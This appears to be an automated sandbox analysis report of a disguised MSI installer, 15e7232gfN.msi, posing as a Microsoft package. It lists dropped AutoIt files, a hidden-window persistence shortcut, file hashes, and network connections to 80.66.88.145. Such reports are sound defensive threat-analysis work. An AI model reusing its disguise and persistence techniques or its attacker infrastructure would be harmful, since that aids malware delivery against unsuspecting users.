                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):775656
                                                        Entropy (8bit):6.502577735066428
                                                        Encrypted:false
                                                        SSDEEP:12288:pbyAIRMKMJZCL+TWHZMxdHQgCUCAH2zxMSTaiTDBCphXUgn+DRVnNsPlU0R/NexP:RgLQQgogvXUnsPlU0ZNMIpc
                                                        MD5:1B524D03B27B94906C1A87B207E08179
                                                        SHA1:8FBAD6275708A69B764992B05126E053134FB9E9
                                                        SHA-256:1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
                                                        SHA-512:1E0F2AEA5DAA40B6CB7DF61BA86E0956356AB7B7ECFC9E2934BC85EEC8D42D3AEB32858DD0EAD24E82EF261A4120F6374263B7AF9256EB79A294D51273CC4F6E
                                                        Malicious:false
                                                        Preview:
                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1512
                                                        Entropy (8bit):3.6912619977233305
                                                        Encrypted:false
                                                        SSDEEP:24:Fmw5dX8DW8XjkLvl0HSEwg7fdrF39wJ9wEy29w8Ut8Jh:nYqjEDfhF39wJ9wEl9wltSh
                                                        MD5:406526B602B613C1EC5672387B911B74
                                                        SHA1:FBF498C6CA5781ECAFD94E44CC9168F07E5E96BC
                                                        SHA-256:F7082EACF5238976BB9C51F2B86AC92201B6AB693584B5E90A94859A477D226A
                                                        SHA-512:4EE4998A66FAF86BC43FEB263ABACF25E876E20CD9A07E937F0E089F4893D011B7BD0740DC4AEA2FDB0B71BA62961615E868FF62C98AD921D7B3E9C3CC4FBC7A
                                                        Malicious:false
                                                        Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.{.2.C.B.A.8.8.3.F.-.5.1.A.6.-.3.D.7.D.-.D.B.B.9.-.0.5.2.7.D.3.9.4.3.3.C.B.}...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.A.u.t.o.i.t.3...e.x.e...C.a.b.H.a.s.h.=.6.5.9.7.3.3.a.5.8.4.c.5.2.0.7.8.a.c.6.b.5.6.8.d.f.b.3.4.a.0.8.9.b.e.f.2.b.3.8.3.5.a.5.e.a.7.3.7.d.3.2.c.1.6.2.3.a.4.6.8.b.7.4.3...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=.U.G.t.Z.g.H.H.T...a.u.3. ...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.F.I.L.E.S.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.b.b.b.4.0.9.b.2.-.5.2.b.d.-.4.c.e.9.-.a.b.7.7.-.0.8.6.8.4.7.a.6.4.4.a.4.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.b.b.b.4.0.9.b.2.-.5.2.b.d.-.4.c.e.9.-.a.b.7.7.-.0.8.6.8.4.7.a.6.4.4.a.4.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Wed Jul 26 11:01:05 2023, mtime=Wed Jul 26 11:02:00 2023, atime=Wed Jul 26 11:01:05 2023, length=893608, window=hide
                                                        Category:dropped
                                                        Size (bytes):891
                                                        Entropy (8bit):4.50280361390797
                                                        Encrypted:false
                                                        SSDEEP:12:8DeLKdcqCzee/NuAkj/BajAWbQbPAVjbPAoubPA1UiKDkmeukmeMBm:8C7fcA+5mAikPA9PA/PA1UJeeeMBm
                                                        MD5:12A296AA09D7196EB34454D70B750991
                                                        SHA1:13DD5F81CBBDD558B2BA94FF4F7A342BABF8F136
                                                        SHA-256:CBFB56EC3F8A746F70B421486F68DD183291185C708CA06CD8D07090BECA0050
                                                        SHA-512:EE6A91FD4AB5470EAED9AF5FEEFB9A95EE1D4237076CCC64C21D8E0B0F82734CBE1514FCE72582048B20F945CD9A9DB2416292B5BD0632BDFB9B57B0A962FF42
                                                        Malicious:false
                                                        Preview:L..................F.... ...C......S.....................................G....P.O. .:i.....+00.../C:\...................`.1......V"`..PROGRA~3..H......L..V"`....F.....................=...P.r.o.g.r.a.m.D.a.t.a.....V.1......V#`..fkeabad.@.......V"`.V(`....<.......................N.f.k.e.a.b.a.d.....b.2......V#` .Autoit3.exe.H.......V#`.V#`....x.....................\G~.A.u.t.o.i.t.3...e.x.e.......Q...............-.......P...........'yV'.....C:\ProgramData\fkeabad\Autoit3.exe..:.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.f.k.e.a.b.a.d.\.A.u.t.o.i.t.3...e.x.e...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.f.k.e.a.b.a.d.\.".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.f.k.e.a.b.a.d.\.e.f.g.h.h.g.d...a.u.3.`.......X.......468325...........!a..%.H.VZAj....,r.h............!a..%.H.VZAj....,r.h...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 3.3.14.5, Subject: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft, Keywords: Installer, Template: Intel;1033, Revision Number: {609A83EA-2275-4DEA-858D-BAEFF01E16D0}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
                                                        Category:dropped
                                                        Size (bytes):1921024
                                                        Entropy (8bit):6.966994454036273
                                                        Encrypted:false
                                                        SSDEEP:24576:ftncpVGP4I9FsEsyt8l+E+s1tB7parWM0+AL5QgZQvUXtAqlU0ZyMRp:epUP59FBJZEH1X1arF0vN/nX
                                                        MD5:247A8CC39384E93D258360A11381000F
                                                        SHA1:23893F035F8564DFEA5030B9FDD54120D96072BB
                                                        SHA-256:6E068B9DCD8DF03FD6456FAEB4293C036B91A130A18F86A945C8964A576C1C70
                                                        SHA-512:336ECA9569C0072E92CE16743F47BA9D6BE06390A196F8E81654D6A42642FF5C99E423BFED00A8396BB0B037D5B54DF8C3BDE53757646E7E1A204F3BE271C998
                                                        Malicious:false
                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):818
                                                        Entropy (8bit):5.483919835925761
                                                        Encrypted:false
                                                        SSDEEP:12:EgSByEK+c8Ov/3khF1ETUYhl/3C8Ov/3khF1Eb8fNEHWot3jtnLx298A6nok9eW:aB9C8Ov/3khANhQ8Ov/3khAD2K0mh
                                                        MD5:4F56271E25939DB53E061A846385F042
                                                        SHA1:120015D53F237F56A5DFB77A1F6198CFC684ECC9
                                                        SHA-256:47B0A4D7E04A361A15D7DC2D05F82F5FAE2030CC75B3B86F93CFC21FE7F4B13A
                                                        SHA-512:404CF7E3610F9B04ADFF4F9C235B780099692A68379D97B484098E211B577B132B9E7E45F5A089EDA653235D7CA4A25AB6C1466C8CB61BCE303A701276820928
                                                        Malicious:false
                                                        Preview:...@IXOS.@.....@#p.V.@.....@.....@.....@.....@.....@......&.{229FD164-E132-4ADB-8998-1DB40BF25484}h.Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..15e7232gfN.msi.@.....@.....@.....@........&.{609A83EA-2275-4DEA-858D-BAEFF01E16D0}.....@.....@.....@.....@.......@.....@.....@.......@....h.Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}^.02:\SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\{2CBA883F-51A6-3D7D-DBB9-0527D39433CB}\LogonUser.@.......@.....@.....@.......@.....@.....@....
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):212992
                                                        Entropy (8bit):6.5134888693588575
                                                        Encrypted:false
                                                        SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                        MD5:D82B3FB861129C5D71F0CD2874F97216
                                                        SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                        SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                        SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):212992
                                                        Entropy (8bit):6.5134888693588575
                                                        Encrypted:false
                                                        SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                        MD5:D82B3FB861129C5D71F0CD2874F97216
                                                        SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                        SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                        SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):1.163838104196163
                                                        Encrypted:false
                                                        SSDEEP:12:JSbX72FjjYAGiLIlHVRpZh/7777777777777777777777777vDHFs5QgAit/l0i5:JJYQI5ttyiF
                                                        MD5:F72F21050D099A517E88C0B9B95BD295
                                                        SHA1:FB927683D4D37559DFE5FF69609B5538620180E2
                                                        SHA-256:C5F264EB1A5BF5F5C0BE377CA6AEEE1D891B78A6A14623185C05425B6E2F25F6
                                                        SHA-512:BE41F6A86A13013A291CD9ABAC362DED02039FEAE472982B6AE0930D592ECA16CD549BEEC7C28D3CB65BC6FBE2EA016B062DE56DCD936B62A3D9603351CC35D3
                                                        Malicious:false
                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):1.5513830917935394
                                                        Encrypted:false
                                                        SSDEEP:48:R8PhYuRc06WXJ0nT5a5Kft/p51ddSromrXvddSB2FrMsUk4:shY13nThf9l0qUUk
                                                        MD5:39D002620A197EA3B427C08D601946F3
                                                        SHA1:14AC8566875EFD30752AD110761404EBF50EBEBE
                                                        SHA-256:1C703D763A36E66B8DD0014B862B08F0334E2F66DEB2AB5906EB8EAC23421FA4
                                                        SHA-512:E294C9F7FE77E87FAF5C3E77A7F222E3DD4218B7125B3F566DAC6C8DC07682BC5C696F2B07A77196333153B7FCA556104169DADA59AD788079CB9C242C7C4AF2
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):933929
                                                        Entropy (8bit):4.386149343450665
                                                        Encrypted:false
                                                        SSDEEP:192:kKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcKqKcKnKcI:h
                                                        MD5:32EE505C5647886928E3D11C54BBA7E4
                                                        SHA1:FE772CBD72DDA16D080E59E10B50FD959E2F1E66
                                                        SHA-256:A7AD713CC2A21F50E2B827BA4FCB58FEEE88920AFA94168186271887C685665E
                                                        SHA-512:AB3FF4C69EDB64D2556B26E7546D6480F3067C2A7C16FAC02B590599927DD35EF7930E8B5690810E1FFDC1139A1896163AE91D81DBC17A584B4C75198F7D5B65
                                                        Malicious:false
                                                        Preview:.2019-06-27 00:56:09, Info DPX Started DPX phase: Resume and Download Job..2019-06-27 00:56:09, Info DPX Started DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX Ended DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX Started DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX Ended DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX CJob::Resume completed with status: 0x0..2019-06-27 00:56:09, Info DPX Ended DPX phase: Resume and Download Job..2019-06-27 00:56:09, Info DPX Started DPX phase: Resume and Download Job..2019-06-27 00:56:09, Info DPX Started DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info DPX Ended DPX phase: Apply Deltas Provided In File..2019-06-27 00:56:09, Info
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):79122
                                                        Entropy (8bit):5.282175982976613
                                                        Encrypted:false
                                                        SSDEEP:192:jmXs969ozNSkk3peTBYeHt0tfoI9qsjl0urmwYyiLP:yXs9UogeWeH29qclhmwYyiz
                                                        MD5:0C40CFAD0BD2539422CAA8F57D8193EA
                                                        SHA1:DB665B3A82042D8CAD0C44B633C9C1D219AA1B14
                                                        SHA-256:BF4A8A2D82A6517F468C4471B0B2394A23EFC2CAEC4C0207924D9B7C3147292B
                                                        SHA-512:15B466CC7BF90D7A1CD8719930B878B13E960E300443846EC0B80D2EF0320E7E360B0CBE29BE06324CD293A6C524085A4C259619CE22C9F5C77CA8D4D6FCC020
                                                        Malicious:false
                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 03:22:38.143 [320]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.159 [320]: ngen returning 0x00000000..07/23/2020 03:22:38.222 [3748]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.237 [3748]: ngen returning 0x00000000..07/23/2020 03:22:38.284 [64]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.300 [64]:
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):1.5513830917935394
                                                        Encrypted:false
                                                        SSDEEP:48:R8PhYuRc06WXJ0nT5a5Kft/p51ddSromrXvddSB2FrMsUk4:shY13nThf9l0qUUk
                                                        MD5:39D002620A197EA3B427C08D601946F3
                                                        SHA1:14AC8566875EFD30752AD110761404EBF50EBEBE
                                                        SHA-256:1C703D763A36E66B8DD0014B862B08F0334E2F66DEB2AB5906EB8EAC23421FA4
                                                        SHA-512:E294C9F7FE77E87FAF5C3E77A7F222E3DD4218B7125B3F566DAC6C8DC07682BC5C696F2B07A77196333153B7FCA556104169DADA59AD788079CB9C242C7C4AF2
                                                        Malicious:false
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):1.2421153914563245
                                                        Encrypted:false
                                                        SSDEEP:48:5zQuWNveFXJLT5Q5Kft/p51ddSromrXvddSB2FrMsUk4:BQMzTff9l0qUUk
                                                        MD5:B1A8670826B5F77BC753BCADC495A828
                                                        SHA1:98D51716C6EBE6688D045C74A540A048ECBFFC0A
                                                        SHA-256:A11AF4BFF8668BD6C80241C2597A694CBD390AB752F6B37BEC7940D03EE6313A
                                                        SHA-512:17BC3BE2FF878149E9B7416160269A9CA59C69425CE3A48C1B3AC6833C7D55871239E7072586466671949EEDE8A5679CA1760ECB8099CF53FC38D2D28108441D
                                                        Malicious:false
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):0.07110935099595517
                                                        Encrypted:false
                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOcd5Qxq1yTTkgVky6lit/:2F0i8n0itFzDHFs5Qgzit/
                                                        MD5:3903929F7674F66DDD40C1E48FE49788
                                                        SHA1:6F61DA648B2F115CFFC54AB5B7D759621AF3C3B7
                                                        SHA-256:D4930E8C3E3CCC91D00F852652EB2EDA8788F1810878386A06F48BA422EFDB66
                                                        SHA-512:0A279D3708A5B942E4F7DEC5C9A921668798CAE13F015150C852F80D326F49019A6B54DD4C56F2AF8EF70A5647C405996AF93A708184B9B479E06DCDF13BF896
                                                        Malicious:false
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):0.13751697623807846
                                                        Encrypted:false
                                                        SSDEEP:24:04D7sUMClNCwY+QJfAebfddipV72nddipVJV2BwGslrkg9SkuK52+kmKfKc5:04/sUwrfddSB2nddSromrX752JjfN5
                                                        MD5:330881AB07C50808A453FA9D40A83756
                                                        SHA1:E68EE2C966806A4C4E9E705653ED77B43053D68C
                                                        SHA-256:61075C0EA7272B6F7C4C4237A4156886F4569170CBC662B8CBA05584745FC90E
                                                        SHA-512:6D0F76A866468244A553055B597E2CCD8B1492F5E93CF9BE2B0C3810CE1DC01A6B7A41F783A327304270E83BA7AD49A6B473188A33B318E415938CE0085118EC
                                                        Malicious:false
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.620131693023677
                                                        Encrypted:false
                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Process:C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):775656
                                                        Entropy (8bit):6.502577735066428
                                                        Encrypted:false
                                                        SSDEEP:12288:pbyAIRMKMJZCL+TWHZMxdHQgCUCAH2zxMSTaiTDBCphXUgn+DRVnNsPlU0R/NexP:RgLQQgogvXUnsPlU0ZNMIpc
                                                        MD5:1B524D03B27B94906C1A87B207E08179
                                                        SHA1:8FBAD6275708A69B764992B05126E053134FB9E9
                                                        SHA-256:1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
                                                        SHA-512:1E0F2AEA5DAA40B6CB7DF61BA86E0956356AB7B7ECFC9E2934BC85EEC8D42D3AEB32858DD0EAD24E82EF261A4120F6374263B7AF9256EB79A294D51273CC4F6E
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:ASCII text, with CRLF, CR, LF line terminators
                                                        Category:dropped
                                                        Size (bytes):264
                                                        Entropy (8bit):4.799289113892546
                                                        Encrypted:false
                                                        SSDEEP:6:zx3MmSLQHtBXVNsR+/HomwD0DIZJQiOC0n:zK/0HtBFNEqIBD0DYJQiI
                                                        MD5:95817EBB90389A8FD4D35E30A512A8ED
                                                        SHA1:DF6DF33A5BB54BC0640C449E226E7A6D4B2E08D1
                                                        SHA-256:B8DFD73944D25D6E6067A5C684571A20E19FB796AFE200A51449AF60D6D0A751
                                                        SHA-512:6786337517865661084B906DA28BE8915313DF5A14380066E9D30A3813E5FD9E0FBB9D9D559D408DCAA74E85E787FBEED8B69A7BC030064AB8F94816834D8A5E
                                                        Malicious:false
                                                        Preview:Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Adding files\Autoit3.exe to Extraction Queue..Adding files\UGtZgHHT.au3 to Extraction Queue....Expanding Files ........Expanding Files Complete .....2 files total...
                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 3.3.14.5, Subject: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft, Keywords: Installer, Template: Intel;1033, Revision Number: {609A83EA-2275-4DEA-858D-BAEFF01E16D0}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
                                                        Entropy (8bit):6.966994454036273
                                                        TrID:
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                        File name:15e7232gfN.msi
                                                        File size:1'921'024 bytes
                                                        MD5:247a8cc39384e93d258360a11381000f
                                                        SHA1:23893f035f8564dfea5030b9fdd54120d96072bb
                                                        SHA256:6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70
                                                        SHA512:336eca9569c0072e92ce16743f47ba9d6be06390a196f8e81654d6a42642ff5c99e423bfed00a8396bb0b037d5b54df8c3bde53757646e7e1a204f3be271c998
                                                        SSDEEP:24576:ftncpVGP4I9FsEsyt8l+E+s1tB7parWM0+AL5QgZQvUXtAqlU0ZyMRp:epUP59FBJZEH1X1arF0vN/nX
                                                        TLSH:A895AE4273B7F022FE9BD132565EEE06317C6C643262E56F239C3869D9301B2663D62D
                                                        Icon Hash:2d2e3797b32b2b99
                                                         Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                                         Jul 26, 2023 14:01:05.669145107 CEST  49690        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.681461096 CEST  49691        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.712990999 CEST  7891         49690      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.713164091 CEST  49690        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.713223934 CEST  49690        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.715008020 CEST  9999         49691      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.789221048 CEST  7891         49690      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.789556980 CEST  7891         49690      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.789592028 CEST  7891         49690      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.789676905 CEST  49690        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.789733887 CEST  49690        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.802953959 CEST  49692        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.830910921 CEST  7891         49690      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.843775988 CEST  7891         49692      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.843946934 CEST  49692        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.844060898 CEST  49692        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.880832911 CEST  7891         49692      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.880882978 CEST  7891         49692      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.881006956 CEST  7891         49692      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:05.881062984 CEST  49692        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.881115913 CEST  49692        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.881158113 CEST  49692        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:05.914927959 CEST  7891         49692      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:06.219929934 CEST  49691        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:06.255738020 CEST  9999         49691      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:06.766566038 CEST  49691        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:06.810133934 CEST  9999         49691      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:06.810844898 CEST  49693        9999       192.168.2.4   80.66.88.145
